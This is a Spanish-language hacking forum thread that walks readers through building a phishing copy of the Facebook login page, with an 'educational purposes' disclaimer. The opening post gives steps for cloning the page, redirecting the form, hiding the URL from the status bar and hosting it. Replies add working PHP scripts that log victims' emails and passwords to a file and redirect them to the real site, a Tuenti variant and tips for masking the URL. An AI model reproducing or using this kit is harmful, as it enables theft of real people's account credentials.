phishing fakebuuk

p1r4t0s · 8 Febrero 2011, 04:42 AM

Bueno este es un ejemplo de phishing
.
.
.
Todo lo que viene a continuación esta hecho con fines educativos y el autor no se hace responsable por el mal uso que se hicieren de este material...

Cosas que vamos a necesitar:

+Conocimietos basicos de html y php
+Archivo index.htm con la fake page
+Archivo write.php con el script capture pass
+Archivo pass.txt donde se guardaran las pass

Paso1.-
Abrimos con el firefox la página objetivo, en este caso el www dot f a c e b o o k dot com

Paso2.-
Abrimos el source code, copiamos todo en un notepad y lo guardamos con el nombre y extención: index.htm

3.-Buscamos los campos el formulario donde se pone el user y pass.

Código [Seleccionar]


<form method=GET action=write.php id="https://login.facebook.com/login.php?login_attempt=1" id="login_form" id=" Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="nu3-U" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_LA" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Dirección de correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u010237_3"><input value="Entrar" tabindex="4" type="submit" id="u010237_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">No cerrar sesión</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">¿Has olvidado tu contraseña?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="nu3-U" autocomplete="off" /></form>

4.- Editamos donde empieza el form y cambiamos:

Código [Seleccionar]

<form method=GET action=write.php ...esto hace que el form ejecute a write.php con la función GET

5.- Editamos en el boton imput entrar:

Código [Seleccionar]

<input value="Entrar" onmouseover="window.status='www.facebook.com';return true" onmouseout="window.status='';return true" tabindex="4" type="submit" id="u010237_3" />

... para que no se vea la url en la barra de estado...

no pongo todo el code pq es muuuy largo

6.- buscamos un hosting gratis ó en alguno que tengamos corriendo nuestra shell y los subimos (este ejemplo: esta testeado en m i a r r o b a)

7.-En nuestro host creamos el archivo pass.txt (donde se guardaran las contraseñas)

8.-Ahora tenemos hecho el 50% del trabajo, toca hacer el fakemail, launcher ó xploit. Aunque un poco de ing. social funciona.

Nota.- No necesariamente tiene que ser en un txt donde guardes los passwords ya que puedes mandarlo a un correo, celular ó guardar los datos a una base de datos. Como ven no tiene mucha ciencia los cripts en si.

Ahhh y tampoco garantiza el 100% de efectividad por ejemplo si la victima ve la URL: xD ya fue..... te pillaron xDDDD

Si bien hay mejores versiones de phishing a fb, esta es la mía y esta en español

y solo quería comprobar lo que se puede hacer

JuszR · 9 Febrero 2011, 00:01 AM

Una especia de xploit, o me equivoco ?

p1r4t0s · 21 Febrero 2011, 04:03 AM

Hola JuszR, un xploit seria el mail seria el fake mail y este es una fake page.

Citar
XPLOIT
Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.

Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.

PHISHING
Ver en wiki

Espero que la explicación resuelva tus dudas

johndogget · 12 Febrero 2012, 22:38 PM

hola soy nuevo y con poca experiencia y sobre todo conocimientos. como armas el fake mail para que sea igual a los que manda fezebuuk? gracias

Bl1ttCeR · 12 Mayo 2012, 17:21 PM

y donde esta el write.php del script capture pass, porque pusiste lo más sencillo que no tiene mayor complicación el script es lo importante creo yo. -.-)

Runex · 12 Mayo 2012, 17:46 PM

p1r4t0s no he tenido tiempo de leer entero tu post, pero supongo que pretendes algo así no?:

http://zonacx.webs.com/tuenti.html

Cambiando el action del formulario, redirigiéndolo hacia un archivo php que guarde los datos en un archivo no?

.

Un saludo

Runex · 12 Mayo 2012, 18:03 PM

Cita de: Runex en 12 Mayo 2012, 17:46 PM
p1r4t0s no he tenido tiempo de leer entero tu post, pero supongo que pretendes algo así no?:

http://zonacx.webs.com/tuenti.html

Cambiando el action del formulario, redirigiéndolo hacia un archivo php que guarde los datos en un archivo no? .

Aviso, no pongáis ningún dato en el formulario que se copian en un txt y solo lo hice como prueba, no quiero lios con compañeros

Un saludo

Bl1ttCeR · 12 Mayo 2012, 18:14 PM

Aquí os dejo una idea de write.php

por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime.

Actualizo con un header fácilmente se le redirigiría, por cierto me he dado cuenta que después de sacar la web con Chrome por lo menos se me queda más pequeña que la real ajaajajaa se nota la diferencia, por otra parte lo de pasar los imputs a la real y hacer el submit es más complejo me da...

Código [Seleccionar]

<?php
$email="";
if (!empty($_REQUEST['email'])){
$email=$_REQUEST['email'];
}

$pass="";
if (!empty($_REQUEST['pass'])){
$pass=$_REQUEST['pass'];
}
 
//Luego sobrescribo el txt
 
$archivo="datos.txt";
 
$file=fopen($archivo,"a"); 
fwrite($file,$email.$pass);  

header('Location: http://www.facebook.com');

?>

Runex · 12 Mayo 2012, 18:19 PM

Cita de: Bl1ttCeR en 12 Mayo 2012, 18:14 PM
Aquí os dejo una idea de write.php por cierto no habría que redirigir al señor de nuevo a la web original y pasarle los campos a esa webs para que se loguease? eso sería sublime

Código [Seleccionar] Expandir
<?php $email=""; if (!empty($_REQUEST['email'])){ $email=$_REQUEST['email']; } $pass=""; if (!empty($_REQUEST['pass'])){ $pass=$_REQUEST['pass']; } //Luego sobrescribo el txt $archivo="datos.txt"; $file=fopen($archivo,"a"); fwrite($file,$email.$pass); ?>

Yo he usado éste para tuenti:

Código (php) [Seleccionar]

<?php
$email = $_POST["email"];
$password = $_POST["input_password"];
$archivo = fopen("cuentas.txt","a");
fwrite($archivo,"Email: ".$email."   Password: ".$password);
fclose($archivo);
?>

Tampoco hay que calentarse mucho la cabeza xD. Eso que dices para loguearse, voy a ponerme ahora con ello pero simplemente hay que añadir un header como has hecho tú

Un saludo

Bl1ttCeR · 12 Mayo 2012, 18:23 PM

Y si enmascaras el localhost con la url de la original... si tienes acceso a la maquina claro está para ello, aunque está más difícil sin acceso, lo digo por el tema de la url diferente.

PD: este post tiene casi 2700visitas y nadie ha dicho nada...